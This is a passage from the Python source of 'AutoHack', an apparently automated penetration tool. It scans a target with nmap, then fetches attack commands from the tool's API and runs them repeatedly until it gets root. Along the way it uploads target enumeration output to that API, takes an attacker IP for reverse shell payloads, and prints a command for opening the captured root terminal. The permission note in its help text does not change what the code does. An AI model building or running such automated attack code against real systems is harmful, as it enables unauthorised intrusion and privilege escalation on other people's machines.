            self.priv_directory,
            os_enumeration_commands['file_name']
        )

        # runs primary enumeration command
        self.run_command_and_grab_new_content(
            self.spearhead_index_unique_id,
            primary_os_enumeration_command,
            primary_os_enumeration_output_file
        )

        # uploads result for analysis
        files_to_upload = {
            os_enumeration_commands['file_name']: open(primary_os_enumeration_output_file, 'rb').read()
        }
        url = f'{self.api_source}/analyze-primary-os-enumeration'
        headers = {
            'API_KEY': self.api_key,
            'session_id': self.session_id,
        }
        response = requests.post(url, files=files_to_upload, headers=headers)
        response_data = response.json()
        return response_data

    def attack_os_repeatedly(self, max_tries: int = 10):
        """
            Repeatedly attack os and check for root access
        """

        # repeatedly exploits and check for root access
        tries = 0
        while True:
            # implement code below
            best_attack = self.get_best_os_attack()
            if not best_attack['should_continue']:
                print('\n\nNo OS Exploit Discovered')
                break


            self.execute_os_attack(best_attack)
            if self.user_is_root():
                message = f"\t{Colors.GREEN}{Colors.BOLD}OS ATTACK SUCCESSFUL{Colors.END} [at {int(time.time())}]\n"
                print(message)
                self.success_status = SuccessStatus.EXPLOIT_OS_SUCCESSFUL
                break

            if tries > max_tries:
                break

            tries += 1

    def handle_success(self):
        if self.success_status == SuccessStatus.EXPLOIT_OS_SUCCESSFUL:
            message = (
                f'\n\n\n'
                f'{Colors.CYAN}{Colors.BOLD}TO ACCESS TARGET ROOT TERMINAL, RUN COMMAND:{Colors.END}\n'
                f'{Colors.GREEN}{Colors.BOLD}\tscreen -r {self.spearhead_index_unique_id}{Colors.END}'
            )
            print(message)
        elif self.success_status == SuccessStatus.EXPLOIT_OS_UNSUCCESSFUL:
            message = (
                f'\n\n\n'
                f'{Colors.CYAN}{Colors.BOLD}TO ACCESS TARGET NON-ROOT TERMINAL, RUN COMMAND:{Colors.END}\n'
                f'{Colors.GREEN}{Colors.BOLD}\tscreen -r {self.spearhead_index_unique_id}{Colors.END}'
            )
            print(message)

    def enumerate_network(self) -> None:
        """
        Does primary enumeration based on scans in the
        service-scans.toml in config folder and user-selected scan type
        :return:
        """
        Utils.print_time()
        print('\n')

        port_scan_data = {
            'nmap_extra': self.nmap_extra,
            'scandir': self.scan_directory,
            'target_address': self.target_address,
            'ports': self.ports,
        }

        for scan_name, scan in self.port_scan_config[self.port_scan_type].items():
            for sub_scan in scan.values():
                command = sub_scan['command']
                self.execute_primary_enumerate_command(
                    command, port_scan_data
                )

        self.process_manager.wait_until_pending_processes_have_completed()

    def exploit_network(self) -> None:
        """
        When run in professional mode, code exploits based on
        commands generated by AutoHack's API
        :return:
        """
        if self.professional:
            self.attack_repeatedly()
        AutoHack.should_kill_heart_beat = True

    def enumerate_os(self) -> None:
        """
        When run in professional mode, code tries to get root access
        by first gathering information about OS.

        If user is already root, then this step isn't needed
        :return:
        """
        if self.professional and self.success_status == SuccessStatus.EXPLOIT_NETWORK_SUCCESSFUL:
            self.success_status = SuccessStatus.EXPLOIT_OS_UNSUCCESSFUL
            self.expected_command_answers_to_verify_root_access = self.get_is_user_root_commands()

            if self.check_if_user_is_already_root():
                self.success_status = SuccessStatus.EXPLOIT_OS_SUCCESSFUL
                return

            print(f"\n\n{Colors.CYAN}ENUMERATING OPERATING SYSTEM:{Colors.END}")
            # slow execution so previous step can finish
            time.sleep(10)
            try:
                os_enumeration_commands = self.determine_primary_os_enumeration()
            except (Exception,):
                raise Utils.AutoHackException(
                    f'Error Determining Primary OS Enumerating'
                )

            # run primary os enumeration
            try:
                secondary_enumeration = self.run_primary_os_enumeration(os_enumeration_commands)
                # todo: do secondary enumeration
            except (Exception,):
                raise Utils.AutoHackException(
                    f'Error With Primary OS Enumeration'
                )


    def exploit_os(self) -> None:
        """
        When run in professional mode, code exploits os based on
        commands generated by AutoHack's API
        :return:
        """
        if self.professional and self.success_status == SuccessStatus.EXPLOIT_OS_UNSUCCESSFUL:
            self.attack_os_repeatedly()
        self.handle_success()


if __name__ == "__main__":
    """
        * Primary Enumeration is based on the:
            -user-selected port scan type
            -service scans in autohack_config.

            This creates xml files which are:
                -(secondary) enumerated


        * Secondary Enumeration is based on the:
            -xml output from Primary Enumeration
            -service sub-scans in autohack_config.

            This creates text files which are:
                -analyzed for regex patterns
    """
    parser = argparse.ArgumentParser(description='Does Enumeration')
    parser.add_argument(
        '-i', '--ip_address', action='store', type=str,
        dest='ip_address', help='IP Address', required=True
    )
    parser.add_argument(
        '-ai', '--attacker_ip_address', action='store', type=str,
        dest='attacker_ip_address', required=False,
        help='Attackers IP Address, Used When Crafting Reverse Shell Payload'
    )
    parser.add_argument(
        '-c', '--config', action='store', type=str,
        dest='config_folder', help='Config Folder'
    )
    parser.add_argument(
        '-o', '--output', action='store', type=str,
        dest='output_folder', help='Output Folder',
    )
    parser.add_argument(
        '--port_scan_type', action='store', type=str,
        default="full", choices=["quick", "udp", "full"],
        dest='port_scan_type', help='Select The Type of Port Scan'
    )
    parser.add_argument(
        '-ne', '--nmap_extra', action='store', type=str,
        dest='nmap_extra', help='Additional Nmap Args', default='-Pn'
    )
    parser.add_argument(
        '-p', '--ports', action='store', type=str,
        dest='ports', help='Ports to Scan', default='80'
    )
    parser.add_argument(
        '--no_processes', action=argparse.BooleanOptionalAction, type=bool,
        dest='no_processes', help='Should Not Use Processes For Secondary Enumeration',
        default=False
    )
    parser.add_argument(
        '-v', '--verbose', action=argparse.BooleanOptionalAction, type=bool,
        dest='verbose', help='Run In Verbose Mode',
        default=False
    )
    parser.add_argument(
        '-ct', '--command_timeout', action='store', type=int,
        dest='command_timeout', help='Max Seconds Command Runs Before Being Killed',
        default=1800
    )
    parser.add_argument(
        '-r', '--retry_max', action='store', type=int,
        dest='retry_max', help='Max Number of Times To Retry A Command',
        default=0
    )
    parser.add_argument(
        '-hbt', '--heart_beat_time', action='store', type=int,
        dest='heart_beat_time', help='Seconds Between Heart Beats',
        default=60
    )
    parser.add_argument(
        '-pro', '--professional',
        action=argparse.BooleanOptionalAction, type=bool, dest='professional',
        help="Uses AutoHack's API to Iteratively Generate and Run Commands "
             "that Attack Target Machine Based on Previous Command-Output Files. "
             "Only Use This If You Have Permission to Penetrate the Target Machine.",
    )
    args = parser.parse_args()
    autohack = AutoHack(
        ip_address=args.ip_address,
        attacker_ip_address=args.attacker_ip_address,
        output_directory=args.output_folder,
        config_directory=args.config_folder,
        port_scan_type=args.port_scan_type,
        nmap_extra=args.nmap_extra,
        ports=args.ports,
        use_processes=not args.no_processes,
        verbose=args.verbose,
        command_timeout=args.command_timeout,
        heart_beat_time=args.heart_beat_time,
        retry_max=args.retry_max,
        professional=args.professional
    )

    autohack.enumerate_network()
    autohack.exploit_network()
    autohack.enumerate_os()
    autohack.exploit_os()
    autohack.wait_for_all_processes()

    print('AutoHack Complete')
